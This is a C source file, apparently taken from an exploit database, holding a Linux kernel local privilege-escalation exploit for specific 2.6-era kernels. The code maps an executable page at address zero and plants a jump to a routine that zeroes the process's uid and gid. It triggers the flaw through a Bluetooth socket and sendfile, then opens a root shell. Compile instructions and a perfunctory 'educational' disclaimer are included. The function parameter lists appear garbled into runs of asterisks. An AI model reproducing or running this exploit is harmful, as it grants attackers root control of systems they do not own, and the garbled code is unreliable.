IDC 2013

1. /*
2.  *
3.  *
4.  * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                    
5.  * 0    _                __         __      __                 1
6.  * 1   /' \          __  /'__`\       /\ \__  /'__`\                0
7.  * 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___         1
8.  * 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\        0
9.  * 0    \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/         1
10.  * 1     \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\         0
11.  * 0      \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/         1
12.  * 1               \ \____/ >> Exploit database separated by exploit   0
13.  * 0                \/___/        type (local, remote, DoS, etc.)    1
14.  * 1                                                        0
15.  * 0  By CrosS                                                1
16.  * 1                                                        0
17.  * 0  Linux 2011                                               1
18.  * 1                                                        0
19.  * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
20.  *
21.  * Linux 2.6.18-128.el5
22.  * Linux 2.6.9-89.EL
23.  * Ubuntu 8.10 Linux 2.6.27
24.  *
25.  * For i386 & ppc compile with the command;
26.  * gcc -w -o exploit exploit.c
27.  *
28.  * For x86_64 kernel and ppc64 Compile as;
29.  * gcc -w -m64 -o exploit exploit.c
30.  *
31.  * Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ..... & all members of r00tw0rm.com ( RW ) .. )
32.  *
33.  * Submit Your Exploit at Submit@1337day.com | mr.inj3ct0r@gmail.com
34.  *
35.  * For Educational purpose Only))
36.  */
37.  
38. #include <stdio.h>
39. #include <stdlib.h>
40. #include <string.h>
41. #include <sys/mman.h>
42. #include <sys/sendfile.h>
43. #include <sys/types.h>
44. #include <sys/socket.h>
45. #include <unistd.h>
46.  
47. #if !defined(__always_inline)
48. #define __always_inline inline __attribute__((always_inline))
49. #endif
50.  
51. #if defined(__i386__) || defined(__x86_64__)
52. #if defined(__LP64__)
53. static __always_inline unsigned long
54. current_stack_pointer(****************)
55. {
56.     unsigned long sp;
57.  
58.     asm volatile ("movq %%rsp,%0; " : "=r" (sp));
59.  
60.     return sp;
61. }
62.  
63. #else
64. static __always_inline unsigned long
65. current_stack_pointer(****************)
66. {
67.     unsigned long sp;
68.  
69.     asm volatile ("movl %%esp,%0" : "=r" (sp));
70.  
71.     return sp;
72. }
73.  
74. #endif
75.  
76. #elif defined(__powerpc__) || defined(__powerpc64__)
77. static __always_inline unsigned long
78. current_stack_pointer(****************)
79. {
80.     unsigned long sp;
81.  
82.     asm volatile ("mr %0,%%r1; " : "=r" (sp));
83.  
84.     return sp;
85. }
86.  
87. #endif
88.  
89. #if defined(__i386__) || defined(__x86_64__)
90. #if defined(__LP64__)
91. static __always_inline unsigned long
92. current_task_struct(****************)
93. {
94.     unsigned long task_struct;
95.  
96.     asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
97.  
98.     return task_struct;
99. }
100.  
101. #else
102. #define TASK_RUNNING 0
103.  
104. static __always_inline unsigned long
105. current_task_struct(****************)
106. {
107.     unsigned long task_struct, thread_info;
108.  
109.     thread_info = current_stack_pointer() & ~(4096 - 1);
110.  
111.     if (*(unsigned long *)thread_info >= 0xc0000000) {
112.        task_struct = *(unsigned long *)thread_info;
113.  
114.        /*
115.         * The TASK_RUNNING is the Only poss1ble sta7e for a proCes5 exEcut1ng
116.         * in us3r-spaCe.
117.         */
118.        if (*(unsigned long *)task_struct == TASK_RUNNING)
119.           return task_struct;
120.     }
121.  
122.     /*
123.     * Prior to the 2.6 kernel series, the task_struct was stored at the end
124.     * of the kernel stack.
125.     */
126.     task_struct = current_stack_pointer() & ~(8192 - 1);
127.  
128.     if (*(unsigned long *)task_struct == TASK_RUNNING)
129.        return task_struct;
130.  
131.     thread_info = task_struct;
132.  
133.     task_struct = *(unsigned long *)thread_info;
134.  
135.     if (*(unsigned long *)task_struct == TASK_RUNNING)
136.        return task_struct;
137.  
138.     return -1;
139. }
140.  
141. #endif
142.  
143. #elif defined(__powerpc__) || defined(__powerpc64__)
144. #define TASK_RUNNING 0
145.  
146. static __always_inline unsigned long
147. current_task_struct(****************)
148. {
149.     unsigned long task_struct, thread_info;
150.  
151. #if defined(__LP64__)
152.     task_struct = current_stack_pointer() & ~(16384 - 1);
153.  
154. #else
155.     task_struct = current_stack_pointer() & ~(8192 - 1);
156.  
157. #endif
158.  
159.     if (*(unsigned long *)task_struct == TASK_RUNNING)
160.        return task_struct;
161.  
162.     thread_info = task_struct;
163.  
164.     task_struct = *(unsigned long *)thread_info;
165.  
166.     if (*(unsigned long *)task_struct == TASK_RUNNING)
167.        return task_struct;
168.  
169.     return -1;
170. }
171.  
172. #endif
173.  
174. #if defined(__i386__) || defined(__x86_64__)
175. static unsigned long uid, gid;
176.  
177. static int
178. change_cred(****************)
179. {
180.     unsigned int *task_struct;
181.  
182.     task_struct = (unsigned int *)current_task_struct();
183.  
184.     while (task_struct) {
185.        if (task_struct[0] == uid && task_struct[1] == uid &&
186.              task_struct[2] == uid && task_struct[3] == uid &&
187.              task_struct[4] == gid && task_struct[5] == gid &&
188.              task_struct[6] == gid && task_struct[7] == gid) {
189.           task_struct[0] = task_struct[1] =
190.           task_struct[2] = task_struct[3] =
191.           task_struct[4] = task_struct[5] =
192.           task_struct[6] = task_struct[7] = 0;
193.           break;
194.        }
195.  
196.        task_struct++;
197.     }
198.  
199.     return -1;
200. }
201.  
202. #elif defined(__powerpc__) || defined(__powerpc64__)
203. static int
204. change_cred(****************)
205. {
206.     unsigned int *task_struct;
207.  
208.     task_struct = (unsigned int *)current_task_struct();
209.  
210.     while (task_struct) {
211.        if (!task_struct[0]) {
212.           task_struct++;
213.           continue;
214.        }
215.  
216.        if (task_struct[0] == task_struct[1] &&
217.              task_struct[0] == task_struct[2] &&
218.              task_struct[0] == task_struct[3] &&
219.              task_struct[4] == task_struct[5] &&
220.              task_struct[4] == task_struct[6] &&
221.              task_struct[4] == task_struct[7]) {
222.           task_struct[0] = task_struct[1] =
223.           task_struct[2] = task_struct[3] =
224.           task_struct[4] = task_struct[5] =
225.           task_struct[6] = task_struct[7] = 0;
226.           break;
227.        }
228.  
229.        task_struct++;
230.     }
231.  
232.     return -1;
233. }
234.  
235. #endif
236.  
237. #define PAGE_SIZE getpagesize()
238.  
239. int
240. main(****************)
241. {
242.     char *addr;
243.     int out_fd, in_fd;
244.     char template[] = "/tmp/tmp.XXXXXX";
245.  
246. #if defined(__i386__) || defined(__x86_64__)
247.     uid = getuid(), gid = getgid();
248.  
249. #endif
250.  
251.     if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
252.           MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
253.        perror("mmap");
254.        exit(EXIT_FAILURE);
255.     }
256.  
257. #if defined(__i386__) || defined(__x86_64__)
258. #if defined(__LP64__)
259.     addr[0] = '\xff';
260.     addr[1] = '\x24';
261.     addr[2] = '\x25';
262.     *(unsigned long *)&addr[3] = 8;
263.     *(unsigned long *)&addr[8] = (unsigned long)change_cred;
264.  
265. #else
266.     addr[0] = '\xff';
267.     addr[1] = '\x25';
268.     *(unsigned long *)&addr[2] = 8;
269.     *(unsigned long *)&addr[8] = (unsigned long)change_cred;
270.  
271. #endif
272.  
273. #elif defined(__powerpc__) || defined(__powerpc64__)
274. #if defined(__LP64__)
275.     /*
276.     * The use of function descriptors by the Power 64-bit ELF ABI requires
277.     * the use of a fake function descriptor.:P
278.     */
279.     *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
280.  
281. #else
282.     addr[0] = '\x3f';
283.     addr[1] = '\xe0';
284.     *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
285.     addr[4] = '\x63';
286.     addr[5] = '\xff';
287.     *(unsigned short *)&addr[6] = (unsigned short)change_cred;
288.     addr[8] = '\x7f';
289.     addr[9] = '\xe9';
290.     addr[10] = '\x03';
291.     addr[11] = '\xa6';
292.     addr[12] = '\x4e';
293.     addr[13] = '\x80';
294.     addr[14] = '\x04';
295.     addr[15] = '\x20';
296.  
297. #endif
298.  
299. #endif
300.  
301.     if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
302.        perror("socket");
303.        exit(EXIT_FAILURE);
304.     }
305.  
306.     if ((in_fd = mkstemp(template)) == -1) {
307.        perror("mkstemp");
308.        exit(EXIT_FAILURE);
309.     }
310.  
311.     if(unlink(template) == -1) {
312.        perror("unlink");
313.        exit(EXIT_FAILURE);
314.     }
315.  
316.     if (ftruncate(in_fd, PAGE_SIZE) == -1) {
317.        perror("ftruncate");
318.        exit(EXIT_FAILURE);
319.     }
320.  
321.     sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
322.  
323.     execl("/bin/sh", "sh", "-i", NULL);
324.  
325.     exit(EXIT_SUCCESS);
326. }